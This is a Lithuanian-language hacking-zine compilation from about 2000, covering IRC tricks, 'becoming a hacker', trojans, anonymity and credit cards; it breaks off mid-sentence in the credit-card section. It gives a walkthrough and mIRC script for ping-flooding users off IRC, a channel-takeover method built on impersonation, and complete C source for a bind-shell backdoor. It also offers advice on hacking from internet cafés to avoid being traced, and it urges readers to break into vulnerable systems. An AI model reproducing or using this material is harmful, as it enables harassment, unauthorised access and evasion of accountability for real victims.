nepraeina neij pora minuciu kaip nuimamas

banas . nes tokiuose kanaluose paprasciausiai

reikalinga liaudis kad ir kokia ji bebutu .

tam kad ten sedetu (rkp belaukian ar dar del kokiunors

kitu priezasciu) . 😉

(beabejo galima pasinaudoti proxi servu paslaugom .

bet apie taj chia nerashysiu (ir tajp jau daug kas

yra prirase apie proxius .))

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[2]] hmm . neturiu jokio *IRC (nej mIRC . ｳ

ｳ nej pIRC . zodziu jokio) o tajp nera laiko ｳ

ｳ ji parsisiust ir tajp reikia pasikalbet ;((( ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

kagi tokiu atveju daryt ? ogi tu kaijp speju sedi

prie windozes ? 😉 taj kokios problemos ? spaudi

start/run (arba win_klavisa+r) ir i langeli irashaj

“telnet” be ->”<- . (reiketu nueit i

terminal/preferences ir nusistatyt telnet’a . bet

shikart ne apie taj . padarysit taj ir be mano

pagalbos) tajgi pagrindiniam lange spaudi

connect/remote system . ir chia pvz :

host name : irc.omnitel.net

port : 6667

term type : vt100

spaudi connect . ir lauki kol pagrindiniam lange

vietoj “(none)” musu atveju pamatysi :

“irc.omnitel.net” . tada rasaj “user a a a a”

butinaj 4-ri (dabar neaiskinsiu kas taj) [enter]

tada rashaij “nick [jusu nick’as]” [enter] .

tada laukiat kol servas ishmes “ping [ir chia kaskox

skaicius]” . toliau rasai “pong [chia rasaij ta

skaiciu kuri gavaj ish servo]” . ir jus jau

prisijunge 😉 . toliau galit rasyt jau iprastas

komandas kaip “join #mr2” (taip . taip . chia

komandos rasomos be “/”) . tiesa jus susidursit

su viena problemele : chia norink kaska pasakyt pvz :

i kanala #mr2 reikia rasyt “privmsg #mr2 [jusu zinute]”

(patarciau parasyt “help” [enter] ir paziuret visas

komandas . nes kajp jau supratot nevisos komandos

tokios pacios kajp pvz: mIRC’e . (zodziu kas iesko

. tas randa) na o sedintiems po *NIX sistema manau

nebus sunku padaryti tapati 😉

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[3]] kaip pasidaryti savo script ? (trumpai) ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

taip taip taip . patikekit manim yra zymiai

maloniau tureti savo paties parasyta script (kaj

zinaj smulkiausias jo ipatybes) nej pasikliauti gana

daznaj backdorus turinchiais skriptajs . (shiaip

man neteko su tokiu script turet reikalu . bet ju

yra .) tiesiog parsisiuskit ircintro.hlp bei

mirc.hlp . (shie helpaj paprastaj buna kartu su

pachiu mIRC’u) na dar galite parsisiust numeric.hlp

. kurio praktiskaj neprireiks pradedanchiam

skript-kiddie . taj pradziai . toliau kaij suprasit

pagrindus patarciau parsisiusti keleta jau padarytu

skriptu . addon’u pvz : ish www.mircscripts.com .

www.mircx.com . ir dar dauk panasiu saijtu .

neslepsiu kad didele dali agurkaz-script parasiau

zvilkteledamas i kitu skriptus . pvz : “warmaster”

(savo laiku pac geriausias . nors jau pasenes yra

daug zmoniu visdar ji naudojanciu) . tiesa i savo

script neidejau ji ishgarsinusio TAKEOVER . shiaip

del kurio yra teke matyt autobana gaunanciu chiuvaku

bandanciu uzeijt i viena ar kita kanala . (vien

delto kad naudoja warmaster’i) . ir begale kitu

naujesniu ir netgi senesniu (juose kartajs net

lengviau susigaudyt nej naujuosiuose .) skriptu

kaip “matrix” “stigmata” ir t.t. (tiesa nepatariu

siustis didelia apimti uzimanciu skriptu nes juose

paprastaj be *.waw *.mp3 failiuku nieko gero ir

nera . (atejtyje galbut parasysiu ir detalesni

script’u darymo tutorial’a (na jej bus norinciu))

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[4]] chiuvakas kaska negero pasake ? nori kersto ? ｳ

ｳ atjungiam chiuwaka ? (ir kajp nuo to paciam ｳ

ｳ apsisaugot) ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

shiaip tokiaijs dalykajs nepatariu uzsiiminet .

taj yra lameriska . bet kartais buna tokiu atveju

kaj buna px ant wisko ir tiesiog norisi pamokyt

chiuwaka . tokiu atveju pirma ka reikia padaryti

priesh karo veiksmus taj ishsiaiskint ant kiek tas

chiuvax kietas . darom “/ctcp [chiuvako nick] version”

ir laukiam atsakymo . tajgi gavom atsakyma pvz :

mirc v5.81 (kuo senesne tuo geriau ) ir viskas

nereiketu rautis ant tu pas kuriuos gaunat atsakyma

BichX v.(nesvarbu kokia) ar kaska kas susije su UNIX

(linux . openbsd . ir t.t. nes greiciausiaj nieko

neisheis 😉 . taipogi nepatarciau prasideti su

chiuwakajs ish kuriu gavot pvz : mirc v.(nesvabu) ir dar

gavot kokianors skripto reklama pvz :

[ agurkaz-script by mr2 ] [ http://mr2lt.cjb.net ]

(chia mano skripto varijantas) . nes papraschiausiai

vilties pamokyt toki chiuwaka mazaij . (nors shiaip .

manes karta paprase kad ishmeginchiau jo script (dabar

tixliaj nepamenu koki script) . ir jis luzho zymiaj

greiciau nej zmogus be script . o shiaip atjungsi

chiuwaka nuo servo ar ne dar labaj priklauso nuo tavo

ineto beij jo ineto rysio . tajgi ishiaiskine

chiuwako “kietumo lygi” 😉 ir nusprende ji issabacint

ish servo . pvz : parsisiunchiam agurkaz-script (ish

http://mr2lt.cjb.net) . spaudziam “klonuotiz” ir

prijunge antra mIRC’a prie servo imames chiuwako

mirties . zodziu spaudziam fludaz/ping fludaz

(shis mano (ir netik) nuomone veiksmingiausias) gaunam

“musu tajkinyz ?” irasom musu aukos nick .

“kiek pingu siusim ?” irasom pvz : 1000 (shiaip uztenka

apie 200 . bet tikrumo labuj) . “laikaz (sekundem)

tarp [ping] ?” irasom pvz : 2 (nemaziau 2-ju . o

shiaip wiskas priklauso nuo jusu ineto ryshio

kokybes . kuo prastesne tuo labiau didint .) tik

shikart nespaudziat ok . wiska tapati pasidarot ir

kitame jau paleistam mIRC’e ir viena po kito (abiejuose)

paspaudziat ok . ir pradedat stebet kas vyksta .

stebit ping reply . kur ping reply laikas turetu vis

didet . ir po shiek tiek lajko “blogiukas” padaro

quit (excess flood) 😉 (kad padarys luzhau galima

tiketis gavus ping reply laika . apie 40sek .

ir daugiau . o kartajs ir maziau .) kaj chiuwakas

luzhta . arba pvz : tau niekajp nepavyksta jo

atjabalint . tiesiog sustabdom fluda .

fludaz/sustabdyt visuz fluduz .

tapati galima padaryt i aliases irasius pvz :

/fludazzz {

.set %tajkinys $$?=”musu tajkinys ?”

.timer10 $$?=”ping sk. ?” $$?=”laikas tarp ping ?” /ctcp %tajkinys ping

}

/stopfludazzz {

.timer10 off

}

ir tada norint fludint reik parasyt “/fludazzz” komanda .

o norint nutraukt ping fluda “/stopfludazzz”

(na norint totaliaj pasitychiot ish lamuxos . atjunge

ji pasikeiskit savo klono nick y jo . sugryzes chiuwakas

dar ilgaj stebesis “kas chia do veikejas tokipati nick kajp

mano sugalvojo ? ir dar klausia ‘kaijp sekas lama ? ;)’ ?!?”)

kaip visa taj vyksta ? . ogi paprastaj : servas paprastaj

supyksta jej kaskoks “kenkejas” pradeda be skaiciaus siust

ctcp’us ir jej pvz : “laikaz (sekundem) tarp [ping] ?”

irasytumet pvz : 0 . shiuo atveju servas jus atjungtu

(kaijp kenkeja) parasydamas excess flood . o kaij jus

kaskam siunciat ping’us . tas kaskas i juos atsakineja

pong’ais ir servas supykes uzh vienu metu siunchiama dideli

kieki pong’u ji atjungia . (tam kad greiciau atjungt kokitaj

chiuwaka ir patariama pasidaryt keleta klonu . nes ping’us

tada siuncia keli irc klientaj . o pong’ais atsakineja

vienas 😉

tiesa nevisada ping’inamas chiuwakas atjungiamas (excess flood)

yra ir kitas bajeris (tiesa rechiau suveikiantis) . reiskias

jus pastoviai siunciat tuos ping’us (ish 2-ju ar daugiau klonu)

ir kaijp iprasta servas karts nuo karto siuncia PING “paketa”

t.y. kaskokitaj skaiciu . irc klijentas gaves shi “paketa”

siunchia servuj PONG “paketa” tapati skaiciuka koki gavo .

taj daroma tam kad servas zinotu “esi gyvas ar nebera taves ?”

. ir kaj chiuwako irc klijentas beatsakinedamas i tavo

siunchiamus PING’us pervelaj atsako servuj . servas pagalvoja

kad irc userio nebera . ir nesvarbu yra jis ar ne ji

papraschiausiaj atjungia parasydamas ping timeout (shitas bajeris

suveikia tik tada kaj chiuvako kuri pinginat : senas kompas .

blogas rishys . zodziu kaj chiuwakas ir tajp netoli mirties ir

tereikia truputi jam padet 😉 ) .

na o pamacius kad visa taj daroma su jumis (jus auka 😉 ) .

tiesiog papraschiausiaj reikia uzdeti tam chiuvakui ignora

(komanda : “/ignore [nick’as]”) . (daugelyje skriptu taj

darosi automatiskaj . kaj chiuwakas per tamtikra laika

padaro tamtikra skaiciu ctcp . kad ir pvz : (mano)

agurkaz-script’e)

tapati galima padaryt i remote irasius pvz :

CTCP *:*:* {

if ( %ctcppro. [ $+ [ $nick ] ] == $null ) {

.set %ctcppro. [ $+ [ $nick ] ] 1

.timer 1 10 unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

}

elseif ( %ctcppro. [ $+ [ $nick ] ] == 1 ) {

.set %ctcppro. [ $+ [ $nick ] ] 2

.timer 1 10 unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

}

elseif ( %ctcppro. [ $+ [ $nick ] ] >= 2 ) {

.ignore $nick

.echo -a 10[*] $nick katik isbande (mass) ctcp apsauga

.unset %ctcppro. [ $+ [ $nick ] ]

goto pabajga

}

:pabajga

.halt

}

ir tam kad variables nesirinktu siuksliu .

options/irc/perform/ uzaktyvuoji (varnele)

“on connect,perform these commands :” ir irasaj :

“/unset %ctcppro*” komanda . spaudi [OK]

ping fluda galima daryt netgi pasinaudojus dos’u pvz :

dos’e rasom :

“ping [chiuwako kompo IP]” (chia reikia zhinoti chiuwako

kompo IP adresa . jis suzinomas “/dns [nick’as]” komanda

sia komanda pingas siunchiamas viena karta .)

“ping -l 2800 -t -w 2000 [chiuwako IP]” (staj shia komanda

ir galima atjungt chiuwaka . (nesigilinsiu y tixlumus .

jej norit detaliau . tiesiog parasykit dos’e “ping” ir

gausit gana ishsamia informacija .)) toliau pakalbesiu apie

DOS ataka (nemaisykit dos operacines sist. su Denial Of

Service ataka 😉 )

na zinoma taj ne pac geriausias budas kanors atjabalint

nuo irc servako . kalbu apie DOS (denial of service)

ataka . bet ping fludas manychiau pac populiariausias

tarp irkininku 😉 . apie DOS atakas daug nekalbesiu

(shiaip nuo shios atakos jau gana senaj buvo luzhes net

pac www.microsoft.com na o netajpjau senaij (jej zhiurit

te-ve) nuo jos nukentejo ir www.yahoo.com bej keletas

kitu ineto gigantu 😉 (tiesa uzhpuolikas buvo susemtas

(mafiaboy berods)) ) shi ataka kajp jau supratot yra

gana daug qr naudojama (paprastaj destrukcijos tixlais)

. shios atakos pasekmes neprognozuojamos taj galibut

pradedant nuo paprasto kompo pakibimo iki “format c:”

(zodziu priklauso ant kiek jusu kompas supsixuos)

zodziu naturaliaj inete viskas vyksta taijp : jusu kompas

siunchia kitam kompuj SYN “paketa” t.y. prasyma

prisijunkti prie kito kompo (chia pvz: ftp http telnet)

. kompas (servas) gaves SYN tuojpat siunchia jums

atsakyma ACK “paketa” t.y. patvirtinima apie SYN

uzklausa jusu kompas prisijungima su kitu kompu

uzhtvirtina nauju ACK “paketu” (shio ACK servas laukia

keleta min. sek. ir jej negauna ACK (ish jusu) ishmeta

ish whaitlisto) . na o dabar isivaizduokit kas darosi

jej jus vienu metu uzhplustat serva vien SYN “paketajs”

ir neatsakinedami prisijungima patvirtinanchiais ACK .

ogi dideja servo waitlistas . niekas negali prisijungt

prie servo (jis apkrautas) . ir tarkim jej jus puolat

shi kompa ish keliu kompu vienu metu ankschiau ar veliau

jis padaro “luzhau” (tas pac www.yahoo.com pavizdys)

panasiu principu atakuojami netik servaj bet ir paprasti

kompaj . zodziu apie mIRC’a . pac populiariausias shiu

laiku nuke’ris beabejo “click v2” ji galite parsisiusti

beveijk ish kiekvieno uzhsenietishko servo (daznaj buna

platinamas kartu su mIRC skriptajs) . jis veikia DOS

atakos principu zodziu pasirenkat auka . darot

“/dns [nick’as]” . status lange sulaukiat

“resolved *.*.*.*” (vietoj ->*<- skaiciukaj pvz: 127.0.0.1)

taj yra chiuwako kompo IP adresas (jej gavot

“unable to resolve” tada pysy-propalo . geriau

pamirskit ji) . ji irashot y betkokio nukerio “IP”

langeli ir vaziuojam . laukiam kol chiudikas “mirs” 😉

na beabejo nuo to yra apsaugu pvz : nukenabber . bet

shio dajkchiuko paprastaj niex naudoja (tie kas nori

apsigint nuo visokiu DOS (be DOS dar yra pvz : Smurf .

Land&Teardrop (visu veikimas panasus)) ataku paprastaj

turi pasistate FireWall’us ir ju su shitom atakom nepaimsi ;))

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

tajgi tajgi . tu esi visiskas lama (ar tiesiog gera

nuotajka ir nori pasilinksmint (pagazdint vargsus irc

userius)) (nepagalvokit kad taj darau nuolat (bet

yra buve (neslepsiu)) . shis pamokymas kajptik tau .

pirma ka reikia padaryt besiruosiant teikoverint kanala

aisq reijkia (apgalvotaj) pasirinkt taikini . reiskias

rasaj “/list” ir lauki kol list lange pasirodys visi tuo

metu esami kanalaj . renkiesi nej dideli nej maza .

kokiu 5-9 zmoniu kanala (chia pagal skoni 😉 )

!!!neuzejni i ji!!! . tau pvz : patiko #lamers kanalas

rasaj “/names #lamers” ir status lange pamataj chiuwaku

sedinciu shiame kanale sarasa . !!!patarimas-ispejimas!!! :

kanale kuri pasirinkaj turetu sedeti keli zmones turintys

o’pus (@) t.y. tau reikes bent keliom sekundem atjungti

viena ish ju . ir po vieno ish ju luzhimo kanale turi

likt bent vienas zmogus su @ . t.y. ne botas . ne klonas

nes jis (jej kvailas ir nesupranta kas yra excess flood .

palaikes tave savo draugu) ir turi tau duoti op’a .

kurio tau ir reikia norint takeover’int kanala . toliau :

jej pasirinktam kanale sedi @rkp shita kanala geriau pamirsk 😉

pasirinkus kanala ir chiuwaka kuris tures trumpam luzhti daraj :

“/ctcp [nickas] version” (zodziu kad nesiplesciau pasakysiu

kad reikia ji atjungti nuo irc nors keliom sekundem .)

(apie taj rasiau truputi ankschiau . (jej shizofrenija

sergi)) ji atjungus nuo servo stajgiai keiti savo nick’a i

jo nick’a (tam reijketu iskart pasiruost) ir uzeini y

(musu atveju) #lamers kanala . tada jej pasiseks to

chiuwako draugaj kuri tu katik atjungej tau duos op’a ir poto

manau tu pac zhinaj ka reikia daryti 😉 (massdeop . zodziu

tu turi likt vienas turintis @ priesh savo nick 😉 ) ir tada

daraj kanori su perimtu kanalu . o vargsaj apgautieji tik ir

spjaudos keiksmais . grasina nukeriu . ping fludu 😉 (na jej

esi tikras lama aisq greitaj padaraj luzhau . ir buni

itrauktas tu chiuwaku shitlist’us (sudziu sarasus))

na o norint nuo to apsisaugot . reikia tiesiog but

atidesniais . pamacius quit(excess flood) reiketu isitikint

kad gryzo jusu draugas ir jej esat jums brangiam kanale be rkp

geriau pasisaugokit . (man paciam buvo bajeris kaj 2-se susikurem

nuosalu kanala ishbandyti mano script . uzhejo chiuwakas davem

jam op’sa o tas 2-viem savaitem bota su invite only pastate

(kanalo aisq negajla . laikinas buvo) bet pamokele gera 😉 )

taipogi neuzdejinet autoOPo kad ir net paciam geriausiam drauguj

pagal nick’a . (maza kas gali atsitikt . sugalvos kox loxelis

nick’a kaijp tavo draugo pasiimt ir uzheis netycia y kanala .

gaus op’a ir priximicins)

ﾚﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄｿ

ｳ autorius : mr2 ｳ

ｳ data : 2000 ｳ

ｳ url : http://mr2lt.cjb.net ｳ

ｳ @mail : mr2@xxx.lt ｳ

ﾀﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾄﾙ

(shi straipsneli leidziu laisvaj platinti inete be mano leidimo tik

butu labaj grazu kad jo turinys nesikeistu . o del gramatiniu

klaidu nepykit (ne spaudaj ji parashiau 😉 ) jej aciras norinciu kad

parasychiau tutorial’a apie mIRC skriptu rasyma . ar norinciu

patart . pataisyt . papildyt shi TUT . mano @mujla zhinot)

(mIRC’e mane galit rasti pvz : #mr2 kanale nick: “mr2” arba “agurkaz”)

21. Kaip nesielgti hakinant

Kaip nesielgti Jus taip nedarykite Vasara del savo neismanymo nukentejo daugelis Lietuvos svetainiu: centras.lt search.lt ir kitos, kuriose buvo skelbimu lentos ar guestbook`ai. As maniau, kad tai buvo gera pamoka ju administratoriams, bei visiems kitiems. Bet pasirodo as klydau. Viena diena, narsydamas www ir sededamas IRC radau nuoroda i viena idomu puslapi: www.satan.lt – juodosios brolijos puslapis. Uzsukes i ji ir perzvelges, sumaniau uzsukti i guestbook`a ir pagirti saita. Uzsikrovus guestbook`ui pamaciau kazka panasaus i tai: galima ivesti html komandas. Pvz: vietoj [ENTER] galima rasyti

. Ir ka jus apie tai manot??????????? Ar tai ne administratoriu klaida, baisi klaida? Bet, pagalvojau as, gal jie nors JavaScrip filtruoja? Tad as emiau ir isbandziau tai. Paprasciausiai irasiau prie savo girtino/peiktino teksto keles eilutes: ; beto idejau nuoroda i uid0 saita: Aisku as galejau visiskai sudirbti si saita: JavaScript pagalba galejau atidaryneti, uzdarineti langus, bei daug daug kitko, iterpus nuoroda i file:///con/con/ galejau nukepti visus win 9.x vartotojus, kurie ten uzklystu. Bet as taip nesiilgiau. As paprasciausiai padariau tik ispejima puslapio webmaster`iui. Kur sio dokumento vertes objektas? Viena kart ismokite daryti tai gerai, ismokite mokytis ne tik is savo bet ir is kito klaidu. Filtruokite savo chat`uose, guestbook`uose, mesage bourde`uose ir kitur kur lankytojai gali ivest teksta (ir jis bus spausdinamas html dokumente) visus HTML tagus, neleiskite vykdyti JavaScript, VisualBasic ir pan. Narsykite www tik isjungia Java. Taip jus isvenksite Java/JavaScript ataku. P.S. As tai nelaikau tikru hackinimu, tai paprasciausiai.

22. Kaip tapti hakeriu

Pirmiausia, manau, apsispresk ar tikrai nori buti hackeriu, nes:

1. Hakeriavimas yra nelegalus (bent daugelyje valstybiu [Lietuvoj kolkas ne]). Netgi tuose valstybese, kuriuose hakerevimas nera antiistatimiskas hakeris vistiek pazeidzia dauguma istatymu. Pvz.: asmens teise i privatuma (E-mail, www, acount ir kt.).

2. Hakeriavimas nera lengvas uzsiemimas, tu turi vis ieskoti ir ieskoti daug info apie naujausius exploitus (arba kaip tikras hakeris juos paciam daryti), ieskoti sistemu klaidu etc. Todel hakervimas dar ir daug laiko uzimantis uzsiemimas. Negalima per savaite tapti hakeriu. Tai pat negalima dometis tuo puse metu ir poto padarius pauze vel gristi. Ne, tu paprasciausiai per daug atsiliktum. Ne taip negalima!

Negalvok, kad filmuose apie hackerius, kopmiuteriu piratus etc rodoma tiesa. Negalvok, kad hakeris koks herojus, gebantis prikirsti visas paneles, dirbantis geroje firmoje etc. Priesingai- ar tau patiktu matyti savo artimuosius, draugus verkencius, liudincius kai tave sujima teisesauga, VSD (valstybes saugumo departamentas).

Bet jai vistiek apsisprendei tapti hakeriu tai pradek kuo greiciau, nes sis informasinis pasaulis keiciasi taip greit, kad nekiekvienas geba ji pasivyti ir neatsilikti.

1.Kaip pradeti?

Daugelyje interneto sistemu stovi UNIX, LINUX, FreeBSD, NetBSD, vienu zodziu, *NIX. Tad norint pradeti hakinti reikia ismokti tai. Aisku negalvok, kad nereikia ismokti windows`u. Priesingai, juos irgi reikia ismanyti. Jei nezinojai yra net ir speciali windowsu versija (distribucija ar pan) skirta serveriams. Tai windows NT.

Taigi griskime prie *NIX. Gauk kokia tai *NIX distribucija, instaliuok ja ir pradek mokytis. Kaip mokytis *NIX? Pradziai gauk pora knygu, tokiu kaip “Linux zaliems” ar pan. Perskaityk jas. Poto imk ka nors rimciau. dalyvauk konferencijuose kuriose snekama ape *NIX. Priprask prie *NIX. Paprogramuok juose. Ismok gerai konfiguruoti sistema. Automatizuok savo veiksmus darydamas skriptus. Ismok *NIX`e (ir netik ten) naudotis internetu (E-mail, telnet, ssh, www, ftp, irc, icq ir kt.). Jei ko nors nezinai nepulk klausineti visu. Paprasciausiai RTFM (read the fucking manual). Niekada negalvok, kad *NIX`e viska jau ismanai.

Na daba jau tu ismanai pakankamai apie *NIX. Gauk savo tikra (ne localu) acounta.

Narsyk www, siurb visa info apie hakinimo metodus, nauja programine iranga, jos klaidas (bug`us). Stenkisc pats rasytis exploitus. Tam turi ismokti keleta programavimo kalbu: c/c++, perl, java.

Prisiregistruok prie ivairiu hakeriu konferenciju, naik i pora IRC serveriu- ten rasi bendraminciu,galesite pasidalinti info ar pan. Nepralesk pro akis nei vieno hack saito.

Ismok neikliuti! Nes kai ikliusi bus per velu! Kaip neikliuti skaityk straipsnyje paranoja.

Ieskok pazeidziamu sistemu ir hakink jas. Tavo tikslas gauti kuo daugiau acount`u is kuriu galetum hakinti kitas sistemas.

Ir jei tu viska darai, kaip parasyta cia- tada gali tapt hakeriu.

23. Kaip veikia trojanai

Cia pabandysiu paiskinti kokiu principu veikia trojanai, kaip jie rasomi etc.

Imkim ir panagrinekim paprasciausia trojana parasyta C kalba:

#include <stdio.h> // iterpiamas standartinio I/O funkciju headeris

#include <errno.h> // klaidu

#include <signal.h%gt; //signalu. Nezinot kas tie signalai? Tai kaip jus naudojates kill programa?

#include <stdlib.h>

#include <netinet/in.h> // iterpemi visi headeriu failai reikalingi dirbti su tinklu, socket ir pan.

#include <sys/types.h>

#include <sys/socket.h>

#include <strings.h> // darbui su eilutem

// Nusirodyk koki tavo trojanas porta naudos, naudok koki standartini- gali lama adminas pamirses sumaisyt su kokiu ftp_data (20 portas) ar pan

// Kitu atveju naudok koki kita porta kuris maziau stebimas

#define P 12345 // ant prikolo imam netbus porta

#define SH “/bin/sh” // nusirodai koki shella naudos tavo trojanas

#define LISTN 5

int main(int argc, char **argv)

{

//pasveikinimo (welkome) zinute

char *fst = “nConnected!nn”;

char *sec = “This tool demonstrated how works trojansn”;

char *thr = “Please enter each command followed by ‘;’n”;

int outsock, insock, sz; //soketu deskriptoriai, ir pagalbinis kintamasis, kuris saugos eiluciu dydi (size)

//reikalingos dvi soketu sructuros (irasai) in ir out

struct sockaddr_in home;

struct sockaddr_in away;

//set port, proto and bzero for BIND

home.sin_family=AF_INET;

home.sin_port=htons(P); // atkreipk demesi cia nurodomas taviskis portas

home.sin_addr.s_addr=INADDR_ANY;

bzero(&(home.sin_zero),8);

signal(SIGCHLD,SIG_IGN);

// pats idomumas prasideda

if((outsock=socket(AF_INET,SOCK_STREAM,0))<0) // ar su soketais viskas ore

exit(printf(“Socket errorn”));

if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0)) // ar bindina ore

exit(printf(“Bind errorn”));

if((listen(outsock,LISTN))<0) //ar listina

exit(printf(“Listen errorn”));

sz=sizeof(struct sockaddr_in);

// jo cia tai tikrai strukturinis programavimas

for(;;) // o rimciau tai amzinas ciklas

{

if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0) //laukiam isoriniu signalu, tuo paciu tikrinam ar nera klaidos

exit(printf(“Accept error”));

if(fork() !=0) //jei sukuriam, dukterini (child) procesa

{

send(insock,fst,strlen(fst),0); // siunciam sveikinimo zinute

send(insock,sec,strlen(sec),0);

send(insock,thr,strlen(thr),0);

dup2(insock,0); // nukreipem STDIN (file deskriptos=0) i soketa

dup2(insock,1); // nukreipiam STDOUT (file deskriptos=1) i soketa

dup2(insock,2); // nukreipiam STDERR (file deskriptos=2) i soketa

execl(SH,SH,(char *)0); // paleidziam savo shella

close(insock); // uzdarom soketa

exit(0); // stai ir baigesi musu sudetingas trojanas.

}

close(insock); // jei nejo sukurt dukterinio proceso (ziureti fork() ) tai uzdarom ansyk soketa ie einam lauk.

}

}

Stai taip atrodo pats elementariausias trojanas. O jus turbut manete, kad tai sudetinga. Siaip sis trojanas ira gan blogas. Jei norite gero trojano eikit i

http://packetstorm.securify.com

ir isten temkit r00tkit`a. Siuo metu as kaip tik apsistojes ties trojanu rasymu, kai parasysiu koki krutesni imesiu. Tad laukite.

Kas sake kad lietuviai trojanu neraso?

Kaip anonimizuotis kitu budu/keliu

By Whisperer // whisperer@worldmailer.com for www.underground.lt

Visi nori anonimizuotis. Visi privalo anonimizuotis jeigu uzsiima ne tik narshymu po puslapius apie geliu auginima, o daro ka nors nelegalaus. Populiariausias budas proxy servai. Tachiau su vienu nieko nepadarysi. Jeigu tikrai nori gerai anonimizuotis turi susijungti i grandine proxy1>proxy2>proxy3 etc. Dar geriau jeigu tie proxiai kinietishki, japanski ar dar kokie (sunkiau susisiekti su ju adminais ir gauti tavo ip adresa)

Tachaiu sparta ziauriai, ziauriai krenta. Ir norint patekti i vilniu ish kauno gaunasi vaziavimas per klaipeda. Ash siulau kita buda. Mieste pilna (bent jau Kaune) visokiu internet’o kaviniu ir t.t. Kai kurios labai nuoshalios ir ten tam tikrom valandom nebuna daug zmoniu (pvz. Sonex’as savanoriu prospekte prie Juzes). Mokestis iki 6 lt uz valanda. Ateini, atsineshi savo irankius, savo reikalinga infa, pasedi valandele, nuhackini ka nors ir pasishalini. Atseks ip adresa nuhackinto servo adminai ir bus jiems ledas. Aishu jeigu nori galima ir ish ten jungtis per kelis proxius (paprastai tokiose vietose ryshys boona geresnis nei per dial-up’a) ir “nuskriausti” adminai tures dar daugiau vargo. Mazai tiketina kad zmogus prileides tave prie interno atsimins ir gales nupasakoti tavo ishvaizda, o tavo duomenu jis nezinos. Aishku nebookit durniai neikit antra kart i ta pachia vieta.

kam daryti sunkiau jei galima lengviau?

2000(c) by Whisperer // whisperer@worldmailer.com

24. KREDITINES KORTELES

Parenge: MG, 1999, Kaunas

Pagal: ‘Credit Carding’ by David Lightman and ‘The Administration’

Kreditines korteles turi mazhiausia 3 apsaugos priemones, kuriu jus

neturetumete iveikti. Tai yra saskaitos numeris, parasho laukas ir

magnetine juosta.

Saskaitos numeris

——————

Telefono numeris kartu su miesto kodu turi 8 skaiczius, asmens kodas – 11.

Tacziau pilnas MasterCard kreditines korteles saskaitos numeris turi 20

skaicziu. Kam tiek daug?

Matematishkai kreditines korteles numeriui pakanka ashtuoniu skaicziu.

Kiekvienas korteles savininkas, be abejo, turi tureti unikalu,

nesikartojanti numeri. Kompanijos Visa ir MasterCard turi mazhdaug po

65 mln. klientu kiekviena. Taigi ju numeracijos sistemos turi sutalpinti apie

65 milijonus imanomu numeriu.

Egzistuoja shimtas milijonu imanomu kombinaciju ish ashtuoniu skaicziu:

00000000, 00000001, 00000002, 00000003, .. iki 99999999. Taigi, ashtuoniu

skaicziu visishkai pakanka. Ateities augimui numatyti, saskaitos numeriui

pakaktu devyniu skaicziu, kas uzhtikrina milijarda skirtingu numeriu.

Faktishkai, Visa kortele turi 13 skaicziu, American Express – 15, Diners

Club korteles – 14, Carte Blanche – 10. Abejotina, kad kredito kompanijos

planuoja tureti visus shiuos milijardus klientu ir suteikti jiems

